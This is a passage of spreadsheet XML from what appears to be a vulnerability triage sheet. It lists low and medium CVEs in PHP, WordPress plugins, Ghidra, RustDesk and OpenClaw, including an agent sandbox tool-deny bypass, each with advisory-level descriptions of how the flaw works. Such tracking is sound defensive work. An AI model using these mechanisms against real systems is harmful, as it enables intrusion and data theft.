          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F403" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G403" s="5" t="inlineStr"/>
      <c r="H403" s="5" t="inlineStr"/>
      <c r="I403" s="5" t="inlineStr"/>
      <c r="J403" s="5" t="inlineStr"/>
      <c r="K403" s="5" t="inlineStr"/>
      <c r="L403" s="5" t="inlineStr"/>
      <c r="M403" s="5" t="inlineStr"/>
      <c r="N403" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O403" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P403" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q403" s="5" t="inlineStr"/>
      <c r="R403" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S403" s="5" t="inlineStr">
        <is>
          <t>phar_tar_number() parses the octal size field of a TAR header into a uint32_t with no overflow check. The field is 11 octal digits wide and holds values up to 0x1FFFFFFFF, so a size above 0xFFFFFFFF silently wraps. The parser then skips the wrong number of data blocks and interprets attacker-controlled file content as the next TAR header, which lets a crafted archive inject entries that PharData reports and extracts as if they were genuine.</t>
        </is>
      </c>
      <c r="T403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6103</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B404" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91769</t>
        </is>
      </c>
      <c r="D404" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E404" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F404" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G404" s="5" t="inlineStr"/>
      <c r="H404" s="5" t="inlineStr"/>
      <c r="I404" s="5" t="inlineStr"/>
      <c r="J404" s="5" t="inlineStr">
        <is>
          <t>openssl, php, rust, hp</t>
        </is>
      </c>
      <c r="K404" s="5" t="inlineStr"/>
      <c r="L404" s="5" t="inlineStr"/>
      <c r="M404" s="5" t="inlineStr"/>
      <c r="N404" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O404" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P404" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q404" s="5" t="inlineStr"/>
      <c r="R404" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="S404" s="5" t="inlineStr">
        <is>
          <t>PHP's OpenSSL stream peer verification checks the certificate's subjectAltName entries first and, whenever no entry matches, falls back to the Common Name. RFC 6125 requires the CN to be ignored once the certificate presents any service identity, so a certificate carrying a non-matching DNS SAN was still accepted when its CN matched the requested peer_name. A certificate trusted by the client for one name can therefore be used to impersonate another.</t>
        </is>
      </c>
      <c r="T404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91769</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B405" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92829</t>
        </is>
      </c>
      <c r="D405" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E405" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F405" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G405" s="5" t="inlineStr"/>
      <c r="H405" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I405" s="5" t="inlineStr"/>
      <c r="J405" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K405" s="5" t="inlineStr"/>
      <c r="L405" s="5" t="inlineStr"/>
      <c r="M405" s="5" t="inlineStr"/>
      <c r="N405" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O405" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P405" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q405" s="5" t="inlineStr"/>
      <c r="R405" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S405" s="5" t="inlineStr">
        <is>
          <t>The Blog2Social: Social Media Auto Post &amp; Scheduler plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 9.1.0. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with contributor-level access and above, to view, modify, or delete other users' Blog2Social records, including disclosing another user's network authentication IDs and scheduled post content, overwriting Open Graph and Twitter Card post metadata on posts they do not own, rebinding another user's social-network authorization, and mass-hiding all users' scheduled posts sitewide. The plugin's b2s_security_nonce is emitted on the post-edit meta box, which Contributors can render, making the nonce available to any authenticated user at that role level or above.</t>
        </is>
      </c>
      <c r="T405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92829</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B406" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97469</t>
        </is>
      </c>
      <c r="D406" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E406" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F406" s="5" t="inlineStr">
        <is>
          <t>f86ef6dc-4d3a-42ad-8f28-e6d5547a5007</t>
        </is>
      </c>
      <c r="G406" s="5" t="inlineStr"/>
      <c r="H406" s="5" t="inlineStr"/>
      <c r="I406" s="5" t="inlineStr"/>
      <c r="J406" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K406" s="5" t="inlineStr"/>
      <c r="L406" s="5" t="inlineStr"/>
      <c r="M406" s="5" t="inlineStr"/>
      <c r="N406" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O406" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P406" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q406" s="5" t="inlineStr"/>
      <c r="R406" s="5" t="inlineStr">
        <is>
          <t>CWE-328</t>
        </is>
      </c>
      <c r="S406" s="5" t="inlineStr">
        <is>
          <t>PostgreSQL Anonymizer contains a vulnerability that allows unprivileged masked users to repeatedly call the anon.hash() function and collects (seed, hash_output) pairs to perform an offline brute-force attack and deduce the salt. A masked role can run a RESTRICTED function when the call is placed inside the sub-select. The problem is resolved in PostgreSQL Anonymizer 3.2.3 and later versions</t>
        </is>
      </c>
      <c r="T406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97469</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B407" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100554</t>
        </is>
      </c>
      <c r="D407" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E407" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F407" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G407" s="5" t="inlineStr"/>
      <c r="H407" s="5" t="inlineStr"/>
      <c r="I407" s="5" t="inlineStr"/>
      <c r="J407" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K407" s="5" t="inlineStr"/>
      <c r="L407" s="5" t="inlineStr"/>
      <c r="M407" s="5" t="inlineStr"/>
      <c r="N407" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O407" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P407" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q407" s="5" t="inlineStr"/>
      <c r="R407" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="S407" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') versions &gt;= 2026.5.12 and &lt; 2026.8.1 do not immediately invalidate Canvas HTTP authorization when a paired node is revoked. Node revocation invalidates the WebSocket client, but Canvas HTTP authorization continues to accept and renew the previously granted capability until WebSocket close cleanup completes. As a result, a revoked paired node can continue exercising its Canvas capability against the capability's configured routes during the close grace period. The issue is fixed in 2026.8.1; as a workaround, restart the Gateway after revoking a node that has Canvas access.</t>
        </is>
      </c>
      <c r="T407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100554</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B408" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88848</t>
        </is>
      </c>
      <c r="D408" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E408" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F408" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G408" s="5" t="inlineStr"/>
      <c r="H408" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I408" s="5" t="inlineStr"/>
      <c r="J408" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K408" s="5" t="inlineStr"/>
      <c r="L408" s="5" t="inlineStr"/>
      <c r="M408" s="5" t="inlineStr"/>
      <c r="N408" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O408" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P408" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q408" s="5" t="inlineStr"/>
      <c r="R408" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S408" s="5" t="inlineStr">
        <is>
          <t>The MasterStudy LMS WordPress plugin from 1.9 before 3.7.50 does not verify that a course a member asks to enrol in is covered by their membership plan, nor that the plan identifier submitted with the request is one they actually hold, allowing any member to enrol themselves into restricted paid courses outside their plan and beyond the number of courses it entitles them to.</t>
        </is>
      </c>
      <c r="T408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88848</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B409" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78394</t>
        </is>
      </c>
      <c r="D409" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="E409" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F409" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G409" s="5" t="inlineStr"/>
      <c r="H409" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I409" s="5" t="inlineStr"/>
      <c r="J409" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K409" s="5" t="inlineStr"/>
      <c r="L409" s="5" t="inlineStr"/>
      <c r="M409" s="5" t="inlineStr"/>
      <c r="N409" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O409" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P409" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q409" s="5" t="inlineStr"/>
      <c r="R409" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S409" s="5" t="inlineStr">
        <is>
          <t>The Link Library WordPress plugin before 7.9.6 does not sanitize a user-supplied destination folder before writing a generated image to disk, allowing users with the Contributor role and above to create directories and write or overwrite image files anywhere the web server can write, including outside the site's document root.
The written file name is always numeric with a fixed image extension, so executable code cannot be planted this way.</t>
        </is>
      </c>
      <c r="T409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78394</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B410" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78397</t>
        </is>
      </c>
      <c r="D410" s="5" t="n">
        <v>4</v>
      </c>
      <c r="E410" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F410" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G410" s="5" t="inlineStr"/>
      <c r="H410" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I410" s="5" t="inlineStr"/>
      <c r="J410" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K410" s="5" t="inlineStr"/>
      <c r="L410" s="5" t="inlineStr"/>
      <c r="M410" s="5" t="inlineStr"/>
      <c r="N410" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O410" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P410" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q410" s="5" t="inlineStr"/>
      <c r="R410" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S410" s="5" t="inlineStr">
        <is>
          <t>The Link Library WordPress plugin before 7.9.6 does not validate the destination of a user-supplied URL before falling back to an unprotected fetch when its safe request is rejected, allowing unauthenticated visitors to make the site issue requests to hosts on its internal network and to learn from the response whether an internal service answered.
Versions below 7.8.8 are covered by CVE-2025-68600; this entry covers 7.8.8 through 7.9.5, where that fix was incomplete. Exploitation requires the site owner to have published the Link Library WordPress plugin before 7.9.6's public link submission form with reciprocal-link validation enabled.</t>
        </is>
      </c>
      <c r="T410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78397</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B411" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97896</t>
        </is>
      </c>
      <c r="D411" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E411" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G411" s="5" t="inlineStr"/>
      <c r="H411" s="5" t="inlineStr"/>
      <c r="I411" s="5" t="inlineStr"/>
      <c r="J411" s="5" t="inlineStr">
        <is>
          <t>f5, php, requests, hp</t>
        </is>
      </c>
      <c r="K411" s="5" t="inlineStr"/>
      <c r="L411" s="5" t="inlineStr"/>
      <c r="M411" s="5" t="inlineStr"/>
      <c r="N411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O411" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P411" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q411" s="5" t="inlineStr"/>
      <c r="R411" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S411" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in krayin laravel-crm up to 2.2.5. This vulnerability affects the function ConfigurationForm::rules of the file packages/Webkul/Admin/src/Http/Requests/ConfigurationForm.php of the component Upload Functionality. The manipulation leads to cross site scripting. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. Upgrading to version 2.2.6 is able to resolve this issue. The identifier of the patch is b9836530ec9f5ef0f51653bb0cbbc47ef7184f51. It is advisable to upgrade the affected component.</t>
        </is>
      </c>
      <c r="T411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97896</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B412" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97897</t>
        </is>
      </c>
      <c r="D412" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E412" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G412" s="5" t="inlineStr"/>
      <c r="H412" s="5" t="inlineStr"/>
      <c r="I412" s="5" t="inlineStr"/>
      <c r="J412" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K412" s="5" t="inlineStr"/>
      <c r="L412" s="5" t="inlineStr"/>
      <c r="M412" s="5" t="inlineStr"/>
      <c r="N412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O412" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P412" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q412" s="5" t="inlineStr"/>
      <c r="R412" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S412" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Krayin laravel-crm up to 2.2.5. This issue affects some unknown processing of the file Sanitizer.php of the component TinyMCE Media Upload. The manipulation results in cross site scripting. The attack may be performed from remote. Upgrading to version 2.2.6 is capable of addressing this issue. The patch is identified as 734aa10ae6c2ffa4c96c8869a89aa66940e4d345. You should upgrade the affected component.</t>
        </is>
      </c>
      <c r="T412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97897</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B413" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C413" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-1218</t>
        </is>
      </c>
      <c r="D413" s="5" t="n">
        <v>3.4</v>
      </c>
      <c r="E413" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F413" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G413" s="5" t="inlineStr"/>
      <c r="H413" s="5" t="inlineStr"/>
      <c r="I413" s="5" t="inlineStr"/>
      <c r="J413" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K413" s="5" t="inlineStr"/>
      <c r="L413" s="5" t="inlineStr"/>
      <c r="M413" s="5" t="inlineStr"/>
      <c r="N413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O413" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P413" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q413" s="5" t="inlineStr"/>
      <c r="R413" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S413" s="5" t="inlineStr">
        <is>
          <t>The mysqlnd wire protocol parser reads fields out of server packets before checking that the packet still holds enough bytes for them. A malicious or compromised MySQL server can send a truncated packet and make the client read past the end of the packet buffer, which is undefined behaviour and can crash the process.</t>
        </is>
      </c>
      <c r="T413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-1218</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B414" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100503</t>
        </is>
      </c>
      <c r="D414" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E414" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G414" s="5" t="inlineStr"/>
      <c r="H414" s="5" t="inlineStr"/>
      <c r="I414" s="5" t="inlineStr"/>
      <c r="J414" s="5" t="inlineStr"/>
      <c r="K414" s="5" t="inlineStr"/>
      <c r="L414" s="5" t="inlineStr"/>
      <c r="M414" s="5" t="inlineStr"/>
      <c r="N414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O414" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P414" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q414" s="5" t="inlineStr"/>
      <c r="R414" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S414" s="5" t="inlineStr">
        <is>
          <t>Ghidra versions through 12.1.4 contain a heap use-after-free vulnerability in the decompiler's Funcdata::opInsertAfter function caused by stale INDIRECT effect-op references. Attackers can craft a malicious binary with a specific x86-64 sequence that triggers the vulnerability during decompilation, causing the decompile helper process to crash and denying service to analysts and automated analysis pipelines.</t>
        </is>
      </c>
      <c r="T414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100503</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B415" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100573</t>
        </is>
      </c>
      <c r="D415" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E415" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G415" s="5" t="inlineStr"/>
      <c r="H415" s="5" t="inlineStr"/>
      <c r="I415" s="5" t="inlineStr"/>
      <c r="J415" s="5" t="inlineStr"/>
      <c r="K415" s="5" t="inlineStr"/>
      <c r="L415" s="5" t="inlineStr"/>
      <c r="M415" s="5" t="inlineStr"/>
      <c r="N415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O415" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P415" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q415" s="5" t="inlineStr"/>
      <c r="R415" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S415" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain a sandbox policy bypass vulnerability in the MCP loopback component that allows sandboxed coding-agent sessions to invoke tools explicitly denied by sandbox.tools.deny policy. Attackers can list and invoke denied tools to access data or perform actions the operator intended to exclude from the sandbox.</t>
        </is>
      </c>
      <c r="T415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100573</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B416" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100417</t>
        </is>
      </c>
      <c r="D416" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E416" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G416" s="5" t="inlineStr"/>
      <c r="H416" s="5" t="inlineStr"/>
      <c r="I416" s="5" t="inlineStr"/>
      <c r="J416" s="5" t="inlineStr">
        <is>
          <t>requests, rust</t>
        </is>
      </c>
      <c r="K416" s="5" t="inlineStr"/>
      <c r="L416" s="5" t="inlineStr"/>
      <c r="M416" s="5" t="inlineStr"/>
      <c r="N416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O416" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P416" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q416" s="5" t="inlineStr"/>
      <c r="R416" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S416" s="5" t="inlineStr">
        <is>
          <t>RustDesk before 1.5.0 on Windows fails to enforce the one-way file transfer option against peer clipboard file requests, allowing authenticated peers to read files from the host clipboard. Attackers can send FormatDataRequest and FileContentsRequest messages to retrieve copied files by guessing the FileGroupDescriptorW format identifier.</t>
        </is>
      </c>
      <c r="T416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100417</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B417" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100534</t>
        </is>
      </c>
      <c r="D417" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E417" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G417" s="5" t="inlineStr"/>
      <c r="H417" s="5" t="inlineStr"/>
      <c r="I417" s="5" t="inlineStr"/>
      <c r="J417" s="5" t="inlineStr"/>
      <c r="K417" s="5" t="inlineStr"/>
      <c r="L417" s="5" t="inlineStr"/>
      <c r="M417" s="5" t="inlineStr"/>
      <c r="N417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O417" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P417" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q417" s="5" t="inlineStr"/>
      <c r="R417" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S417" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain an authorization bypass vulnerability in webhook TaskFlow cancellation that allows attackers to cancel unrelated sessions. An attacker with a webhook route secret can supply an arbitrary child session key to cancel ACP or subagent work outside the route's configured authority.</t>
        </is>
      </c>
      <c r="T417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100534</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B418" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100537</t>
        </is>
      </c>
      <c r="D418" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E418" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G418" s="5" t="inlineStr"/>
      <c r="H418" s="5" t="inlineStr"/>
      <c r="I418" s="5" t="inlineStr"/>
      <c r="J418" s="5" t="inlineStr">
        <is>
          <t>npm, gin</t>
        </is>
      </c>
      <c r="K418" s="5" t="inlineStr"/>
      <c r="L418" s="5" t="inlineStr"/>
      <c r="M418" s="5" t="inlineStr"/>
      <c r="N418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O418" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
